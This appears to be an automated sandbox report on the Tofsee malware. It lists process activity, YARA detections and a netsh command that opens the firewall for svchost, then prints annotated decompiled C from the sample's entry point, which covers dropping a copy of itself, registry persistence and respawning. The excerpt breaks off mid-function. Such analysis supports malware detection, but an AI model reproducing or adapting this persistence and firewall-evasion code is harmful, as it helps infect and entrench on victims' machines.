• Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:low

Target ID:14
Start time:01:01:27
Start date:07/07/2022
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Imagebase:0xf70000
File size:82944 bytes
MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:15
Start time:01:01:27
Start date:07/07/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c9170000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:17
                                                                                                                                Start time:01:01:29
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:svchost.exe
                                                                                                                                Imagebase:0x350000
                                                                                                                                File size:44520 bytes
                                                                                                                                MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen

                                                                                                                                Target ID:18
                                                                                                                                Start time:01:01:32
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:19
                                                                                                                                Start time:01:01:33
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:20
                                                                                                                                Start time:01:01:34
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:21
                                                                                                                                Start time:01:01:34
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:22
                                                                                                                                Start time:01:01:35
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                Imagebase:0x7ff70eae0000
                                                                                                                                File size:163336 bytes
                                                                                                                                MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:23
                                                                                                                                Start time:01:01:35
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:24
                                                                                                                                Start time:01:01:36
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:26
                                                                                                                                Start time:01:01:48
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:27
                                                                                                                                Start time:01:01:48
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:28
                                                                                                                                Start time:01:02:05
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:30
                                                                                                                                Start time:01:02:16
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:34
                                                                                                                                Start time:01:02:31
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:36
                                                                                                                                Start time:01:02:36
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                Imagebase:0x7ff7b0320000
                                                                                                                                File size:455656 bytes
                                                                                                                                MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Target ID:37
                                                                                                                                Start time:01:02:36
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7c9170000
                                                                                                                                File size:625664 bytes
                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language


                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:2.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:14.6%
                                                                                                                                  Signature Coverage:38.7%
                                                                                                                                  Total number of Nodes:390
                                                                                                                                  Total number of Limit Nodes:22
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			_entry_(CHAR* _a12, void* _a15) {
                                                                                                                                  				char _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				char _v32;
                                                                                                                                  				union _GET_FILEEX_INFO_LEVELS _v36;
                                                                                                                                  				CHAR* _v40;
                                                                                                                                  				char _v44;
                                                                                                                                  				char _v48;
                                                                                                                                  				struct _PROCESS_INFORMATION _v64;
                                                                                                                                  				char _v80;
                                                                                                                                  				char _v112;
                                                                                                                                  				char _v371;
                                                                                                                                  				char _v372;
                                                                                                                                  				char _v671;
                                                                                                                                  				char _v672;
                                                                                                                                  				char _v704;
                                                                                                                                  				struct _STARTUPINFOA _v772;
                                                                                                                                  				char _v1271;
                                                                                                                                  				char _v1272;
                                                                                                                                  				char _v1672;
                                                                                                                                  				char _t238;
                                                                                                                                  				long _t239;
                                                                                                                                  				char _t242;
                                                                                                                                  				long _t244;
                                                                                                                                  				CHAR* _t248;
                                                                                                                                  				char _t250;
                                                                                                                                  				intOrPtr _t257;
                                                                                                                                  				char _t267;
                                                                                                                                  				intOrPtr* _t272;
                                                                                                                                  				char _t276;
                                                                                                                                  				char _t279;
                                                                                                                                  				char _t282;
                                                                                                                                  				char _t283;
                                                                                                                                  				void* _t284;
                                                                                                                                  				char _t294;
                                                                                                                                  				CHAR* _t303;
                                                                                                                                  				int _t304;
                                                                                                                                  				char _t309;
                                                                                                                                  				CHAR* _t312;
                                                                                                                                  				char _t318;
                                                                                                                                  				int _t324;
                                                                                                                                  				CHAR* _t325;
                                                                                                                                  				char _t328;
                                                                                                                                  				char* _t331;
                                                                                                                                  				char _t332;
                                                                                                                                  				char _t340;
                                                                                                                                  				char _t344;
                                                                                                                                  				CHAR* _t357;
                                                                                                                                  				CHAR* _t358;
                                                                                                                                  				int _t359;
                                                                                                                                  				int _t373;
                                                                                                                                  				long _t379;
                                                                                                                                  				void* _t383;
                                                                                                                                  				void* _t396;
                                                                                                                                  				void* _t401;
                                                                                                                                  				char _t402;
                                                                                                                                  				char _t403;
                                                                                                                                  				intOrPtr* _t410;
                                                                                                                                  				void* _t411;
                                                                                                                                  				char _t417;
                                                                                                                                  				char _t418;
                                                                                                                                  				void* _t424;
                                                                                                                                  				intOrPtr _t426;
                                                                                                                                  				void* _t428;
                                                                                                                                  				char* _t436;
                                                                                                                                  				intOrPtr _t441;
                                                                                                                                  				CHAR* _t442;
                                                                                                                                  				void* _t450;
                                                                                                                                  				void* _t451;
                                                                                                                                  				char _t459;
                                                                                                                                  				void* _t464;
                                                                                                                                  				void* _t465;
                                                                                                                                  				void* _t467;
                                                                                                                                  				void* _t468;
                                                                                                                                  				void* _t469;
                                                                                                                                  				void* _t470;
                                                                                                                                  				void* _t471;
                                                                                                                                  				void* _t474;
                                                                                                                                  				intOrPtr _t475;
                                                                                                                                  
                                                                                                                                  				SetErrorMode(3); // executed
                                                                                                                                  				SetErrorMode(3); // executed
                                                                                                                                  				SetUnhandledExceptionFilter(E00406511); // executed
                                                                                                                                  				E0040EC54(); // executed
                                                                                                                                  				_t475 =  *0x41201f; // 0x0
                                                                                                                                  				if(_t475 != 0) {
                                                                                                                                  					__eflags =  *0x4133d8;
                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                  						L126:
                                                                                                                                  						CreateThread(0, 0, E0040405E, 0, 0, 0);
                                                                                                                                  						__imp__#115(0x1010,  &_v1672);
                                                                                                                                  						E0040E52E(_t449, __eflags);
                                                                                                                                  						E0040EAAF(1, 0);
                                                                                                                                  						E00401D96(_t438, 0x412118);
                                                                                                                                  						E004080C9(_t438);
                                                                                                                                  						CreateThread(0, 0, E0040877E, 0, 0, 0);
                                                                                                                                  						E00405E6C(__eflags);
                                                                                                                                  						E00403132();
                                                                                                                                  						E0040C125(__eflags);
                                                                                                                                  						E00408DB1(_t438);
                                                                                                                                  						Sleep(0xbb8);
                                                                                                                                  						E0040C4EE();
                                                                                                                                  						while(1) {
                                                                                                                                  							__eflags =  *0x4133d0;
                                                                                                                                  							if( *0x4133d0 == 0) {
                                                                                                                                  								goto L129;
                                                                                                                                  							}
                                                                                                                                  							_t239 = GetTickCount();
                                                                                                                                  							__eflags = _t239 -  *0x4133d0 - 0x109a0;
                                                                                                                                  							if(_t239 -  *0x4133d0 < 0x109a0) {
                                                                                                                                  								L131:
                                                                                                                                  								Sleep(0x1a90);
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							L129:
                                                                                                                                  							_t238 = E0040C913();
                                                                                                                                  							__eflags = _t238;
                                                                                                                                  							if(_t238 == 0) {
                                                                                                                                  								 *0x4133d0 = GetTickCount();
                                                                                                                                  							}
                                                                                                                                  							goto L131;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_a12 = 0xa;
                                                                                                                                  					while(1) {
                                                                                                                                  						_t242 = DeleteFileA(0x4133d8);
                                                                                                                                  						__eflags = _t242;
                                                                                                                                  						if(_t242 != 0) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _a12;
                                                                                                                                  						if(_a12 <= 0) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						_t244 = GetLastError();
                                                                                                                                  						__eflags = _t244 - 2;
                                                                                                                                  						if(_t244 == 2) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						_t219 =  &_a12;
                                                                                                                                  						 *_t219 = _a12 - 1;
                                                                                                                                  						__eflags =  *_t219;
                                                                                                                                  						Sleep(0x3e8);
                                                                                                                                  					}
                                                                                                                                  					E0040EE2A(_t438, 0x4133d8, 0, 0x104);
                                                                                                                                  					_t465 = _t465 + 0xc;
                                                                                                                                  					goto L126;
                                                                                                                                  				} else {
                                                                                                                                  					_v12 = 0;
                                                                                                                                  					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
                                                                                                                                  						_v672 = 0;
                                                                                                                                  					}
                                                                                                                                  					if(_v672 == 0x22) {
                                                                                                                                  						E0040EF00( &_v672,  &_v671);
                                                                                                                                  						_t436 = E0040ED23( &_v672, 0x22);
                                                                                                                                  						_t465 = _t465 + 0x10;
                                                                                                                                  						if(_t436 != 0) {
                                                                                                                                  							 *_t436 = 0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t248 = GetCommandLineA();
                                                                                                                                  					_t459 = 0x4122f8;
                                                                                                                                  					_a12 = _t248;
                                                                                                                                  					_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
                                                                                                                                  					_t454 = 0x100;
                                                                                                                                  					_v8 = _t250;
                                                                                                                                  					E0040EE2A(_t438, 0x4122f8, 0, 0x100);
                                                                                                                                  					_t467 = _t465 + 0x28;
                                                                                                                                  					if(_v8 == 0) {
                                                                                                                                  						_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
                                                                                                                                  						_t467 = _t467 + 0x14;
                                                                                                                                  						_v16 = _t257;
                                                                                                                                  						if(_t257 == 0) {
                                                                                                                                  							E0040EF00(0x4121a8,  &_v672);
                                                                                                                                  							_pop(_t438);
                                                                                                                                  							_a12 = GetCommandLineA();
                                                                                                                                  							_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
                                                                                                                                  							E0040EE2A(_t438, 0x4122f8, 0, 0x100);
                                                                                                                                  							_t468 = _t467 + 0x28;
                                                                                                                                  							__eflags = _v8;
                                                                                                                                  							if(_v8 == 0) {
                                                                                                                                  								L102:
                                                                                                                                  								_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
                                                                                                                                  								E0040EE2A(_t438, _t459, 0, _t454);
                                                                                                                                  								_t467 = _t468 + 0x28;
                                                                                                                                  								__eflags = _v8;
                                                                                                                                  								if(_v8 == 0) {
                                                                                                                                  									L110:
                                                                                                                                  									_t267 = E00406EC3();
                                                                                                                                  									__eflags = _t267;
                                                                                                                                  									if(_t267 != 0) {
                                                                                                                                  										E004098F2(_t438);
                                                                                                                                  										L19:
                                                                                                                                  										ExitProcess(0); // executed
                                                                                                                                  									}
                                                                                                                                  									__eflags = _v372;
                                                                                                                                  									if(_v372 == 0) {
                                                                                                                                  										L116:
                                                                                                                                  										 *0x4133b0 = 0;
                                                                                                                                  										L117:
                                                                                                                                  										_v64.hProcess =  &_v372;
                                                                                                                                  										_v64.hThread = E00409961;
                                                                                                                                  										_v64.dwProcessId = 0;
                                                                                                                                  										_v64.dwThreadId = 0;
                                                                                                                                  										StartServiceCtrlDispatcherA( &_v64);
                                                                                                                                  										goto L19;
                                                                                                                                  									}
                                                                                                                                  									_t272 =  &_v372;
                                                                                                                                  									_t449 = _t272 + 1;
                                                                                                                                  									do {
                                                                                                                                  										_t438 =  *_t272;
                                                                                                                                  										_t272 = _t272 + 1;
                                                                                                                                  										__eflags = _t438;
                                                                                                                                  									} while (_t438 != 0);
                                                                                                                                  									__eflags = _t272 - _t449 - 0x20;
                                                                                                                                  									if(_t272 - _t449 >= 0x20) {
                                                                                                                                  										goto L116;
                                                                                                                                  									}
                                                                                                                                  									E0040EF00(0x4133b0,  &_v372);
                                                                                                                                  									_pop(_t438);
                                                                                                                                  									goto L117;
                                                                                                                                  								}
                                                                                                                                  								_t459 = _v8 + 3;
                                                                                                                                  								_t276 = E0040ED03(_t459, 0x20);
                                                                                                                                  								_pop(_t438);
                                                                                                                                  								__eflags = _t276;
                                                                                                                                  								if(_t276 != 0) {
                                                                                                                                  									L107:
                                                                                                                                  									_t454 = _t276 - _t459;
                                                                                                                                  									__eflags = _t454 - 0x20;
                                                                                                                                  									if(_t454 >= 0x20) {
                                                                                                                                  										_t454 = 0x1f;
                                                                                                                                  									}
                                                                                                                                  									E0040EE08(0x412184, _t459, _t454);
                                                                                                                                  									_t467 = _t467 + 0xc;
                                                                                                                                  									 *((char*)(_t454 + 0x412184)) = 0;
                                                                                                                                  									goto L110;
                                                                                                                                  								}
                                                                                                                                  								_t279 = _t459;
                                                                                                                                  								_t449 = _t279 + 1;
                                                                                                                                  								do {
                                                                                                                                  									_t438 =  *_t279;
                                                                                                                                  									_t279 = _t279 + 1;
                                                                                                                                  									__eflags = _t438;
                                                                                                                                  								} while (_t438 != 0);
                                                                                                                                  								_t276 = _t279 - _t449 + _t459;
                                                                                                                                  								__eflags = _t276;
                                                                                                                                  								goto L107;
                                                                                                                                  							}
                                                                                                                                  							_t282 = _v8 + 3;
                                                                                                                                  							_v672 = 0;
                                                                                                                                  							__eflags =  *_t282 - 0x22;
                                                                                                                                  							_v20 = _t282;
                                                                                                                                  							if( *_t282 != 0x22) {
                                                                                                                                  								_t283 = E0040ED03(_v20, 0x20);
                                                                                                                                  								_pop(_t438);
                                                                                                                                  								__eflags = _t283;
                                                                                                                                  								if(_t283 == 0) {
                                                                                                                                  									_t283 =  &(_a12[lstrlenA(_a12)]);
                                                                                                                                  									__eflags = _t283;
                                                                                                                                  								}
                                                                                                                                  								_t284 = _t283 - _v8;
                                                                                                                                  								_v24 = _t284;
                                                                                                                                  								__eflags = _t284 + 0xfffffffd;
                                                                                                                                  								E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
                                                                                                                                  								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
                                                                                                                                  								L98:
                                                                                                                                  								_t468 = _t468 + 0xc;
                                                                                                                                  								L99:
                                                                                                                                  								__eflags = _v672;
                                                                                                                                  								if(_v672 != 0) {
                                                                                                                                  									E0040EE08(0x4133d8,  &_v672, 0x103);
                                                                                                                                  									_t468 = _t468 + 0xc;
                                                                                                                                  								}
                                                                                                                                  								 *0x412cc0 = 1;
                                                                                                                                  								goto L102;
                                                                                                                                  							}
                                                                                                                                  							_v20 = _v8 + 4;
                                                                                                                                  							_t294 = E0040ED03(_v8 + 4, 0x22);
                                                                                                                                  							_pop(_t438);
                                                                                                                                  							__eflags = _t294;
                                                                                                                                  							if(_t294 == 0) {
                                                                                                                                  								goto L99;
                                                                                                                                  							}
                                                                                                                                  							_v24 = _t294 - _v8;
                                                                                                                                  							E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
                                                                                                                                  							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
                                                                                                                                  							goto L98;
                                                                                                                                  						}
                                                                                                                                  						_v36 = 0;
                                                                                                                                  						if(_t257 >= 4 || _v48 > 0x5e && _v44 != 0) {
                                                                                                                                  							L84:
                                                                                                                                  							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
                                                                                                                                  								_t303 =  &_v672;
                                                                                                                                  								if(_v672 == 0x22) {
                                                                                                                                  									_t303 =  &_v671;
                                                                                                                                  								}
                                                                                                                                  								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
                                                                                                                                  									_t303[3] = 0;
                                                                                                                                  									_t304 = GetDriveTypeA(_t303);
                                                                                                                                  									_t515 = _t304 - 2;
                                                                                                                                  									if(_t304 != 2) {
                                                                                                                                  										E00409145(_t515);
                                                                                                                                  										_t438 = 1;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L19;
                                                                                                                                  						} else {
                                                                                                                                  							E00404280(_t438, 1); // executed
                                                                                                                                  							_pop(_t438);
                                                                                                                                  							if(_v672 == 0) {
                                                                                                                                  								goto L84;
                                                                                                                                  							}
                                                                                                                                  							_t309 = E0040675C( &_v672,  &_v12, 0); // executed; appears to return a buffer (_v8) and its length (_v12), released later via E0040EC2E(_v8)
                                                                                                                                  							_t467 = _t467 + 0xc;
                                                                                                                                  							_v8 = _t309;
                                                                                                                                  							if(_t309 == 0 || _v12 == 0) { // nothing to drop: bail out
                                                                                                                                  								goto L84;
                                                                                                                                  							} else {
                                                                                                                                  								_v32 = 0;
                                                                                                                                  								_v28 = 0;
                                                                                                                                  								if(_v16 == 2) {
                                                                                                                                  									L55:
                                                                                                                                  									__eflags = _v16 - 3;
                                                                                                                                  									if(_v16 >= 3) {
                                                                                                                                  										L83:
                                                                                                                                  										E0040EC2E(_v8); // appears to release the buffer obtained from E0040675C
                                                                                                                                  										_pop(_t438);
                                                                                                                                  										if(_v36 != 0) { // success flag: set once the original image path was handed over, cleared if CreateProcessA fails
                                                                                                                                  											goto L19;
                                                                                                                                  										}
                                                                                                                                  										goto L84;
                                                                                                                                  									}
                                                                                                                                  									_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8); // runtime-decoded 12-byte string; the variable name is not recoverable from this listing
                                                                                                                                  									_t469 = _t467 + 0x14;
                                                                                                                                  									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4); // alternative drop directory read from an environment variable (buffer 0x1f4 == 500 bytes)
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										L82:
                                                                                                                                  										E0040EE2A(_t438, _t459, 0, _t454);
                                                                                                                                  										_t467 = _t469 + 0xc;
                                                                                                                                  										goto L83;
                                                                                                                                  									}
                                                                                                                                  									_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
                                                                                                                                  									_t469 = _t469 + 0x14;
                                                                                                                                  									__eflags = _t318;
                                                                                                                                  									if(_t318 == 0) {
                                                                                                                                  										goto L82;
                                                                                                                                  									}
                                                                                                                                  									E0040EE2A(_t438, _t459, 0, _t454); // memset-like zeroing; the same helper is used below as (buf, 0, size)
                                                                                                                                  									_t470 = _t469 + 0xc;
                                                                                                                                  									_v1272 = 0x22; // build "<dropped path>": opening quote ...
                                                                                                                                  									lstrcpyA( &_v1271,  &_v672); // ... then the dropped file's path ...
                                                                                                                                  									_t324 = lstrlenA( &_v1272);
                                                                                                                                  									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22; // ... then the closing quote at &_v1272[len]
                                                                                                                                  									_t325 = _t324 + 1;
                                                                                                                                  									__eflags = _v16 - 2;
                                                                                                                                  									_a12 = _t325; // _a12 == strlen of the quoted path
                                                                                                                                  									 *((char*)(_t464 + _t325 - 0x4f4)) = 0; // NUL terminator
                                                                                                                                  									if(_v16 != 2) {
                                                                                                                                  										L60:
                                                                                                                                  										_push(0);
                                                                                                                                  										_push( &_v112);
                                                                                                                                  										_t328 = E00406DC2(_t438) ^ 0x5e5e5e5e; // seed XORed with 0x5e5e5e5e ...
                                                                                                                                  										__eflags = _t328;
                                                                                                                                  										_push(_t328);
                                                                                                                                  										E0040F133(); // ... appears to generate the registry value name into _v112 (the same helper generates the file name further down)
                                                                                                                                  										_t470 = _t470 + 0xc;
                                                                                                                                  										L61:
                                                                                                                                  										_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8); // runtime-decoded 0x2e-byte key path (not recoverable from this listing)
                                                                                                                                  										_t471 = _t470 + 0x14;
                                                                                                                                  										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24); // 0x80000001 == HKEY_CURRENT_USER; 0x103 == KEY_QUERY_VALUE | KEY_SET_VALUE | KEY_WOW64_64KEY
                                                                                                                                  										_v20 = _t332;
                                                                                                                                  										__eflags = _t332;
                                                                                                                                  										if(_t332 == 0) {
                                                                                                                                  											_t373 =  &(_a12[1]); // strlen + 1: cbData includes the NUL
                                                                                                                                  											__eflags = _t373;
                                                                                                                                  											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373); // type 1 == REG_SZ: value <generated name> = "<dropped path>"
                                                                                                                                  											RegCloseKey(_v24);
                                                                                                                                  										}
                                                                                                                                  										E0040EE2A(_t438, _t459, 0, _t454);
                                                                                                                                  										E0040EE2A(_t438,  &_v772, 0, 0x44); // zero STARTUPINFOA (0x44 == sizeof(STARTUPINFOA))
                                                                                                                                  										_v772.cb = 0x44;
                                                                                                                                  										E0040EE2A(_t438,  &_v64, 0, 0x10); // zero PROCESS_INFORMATION (0x10 bytes)
                                                                                                                                  										_t469 = _t471 + 0x24;
                                                                                                                                  										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104); // own image path (0x104 == MAX_PATH)
                                                                                                                                  										__eflags = _t340;
                                                                                                                                  										if(_t340 != 0) {
                                                                                                                                  											__eflags = _v372 - 0x22;
                                                                                                                                  											_t357 =  &_v372;
                                                                                                                                  											_v40 = _t357;
                                                                                                                                  											if(_v372 == 0x22) {
                                                                                                                                  												_t357 =  &_v371;
                                                                                                                                  												_v40 = _t357;
                                                                                                                                  											}
                                                                                                                                  											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
                                                                                                                                  											if( *((char*)(_t357 + 1)) == 0x3a) {
                                                                                                                                  												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
                                                                                                                                  												if( *((char*)(_t357 + 2)) == 0x5c) {
                                                                                                                                  													_t358 = _v40;
                                                                                                                                  													_t438 = _t358[3];
                                                                                                                                  													_a15 = _t358[3]; // save the character after "X:\" ...
                                                                                                                                  													_t358[3] = 0; // ... and truncate to the drive root for GetDriveTypeA
                                                                                                                                  													_t359 = GetDriveTypeA(_t358);
                                                                                                                                  													__eflags = _t359 - 2;
                                                                                                                                  													if(_t359 != 2) { // not DRIVE_REMOVABLE: hand the original image path to the dropped copy
                                                                                                                                  														_t438 = _v40;
                                                                                                                                  														_v40[3] = _a15; // restore the full path
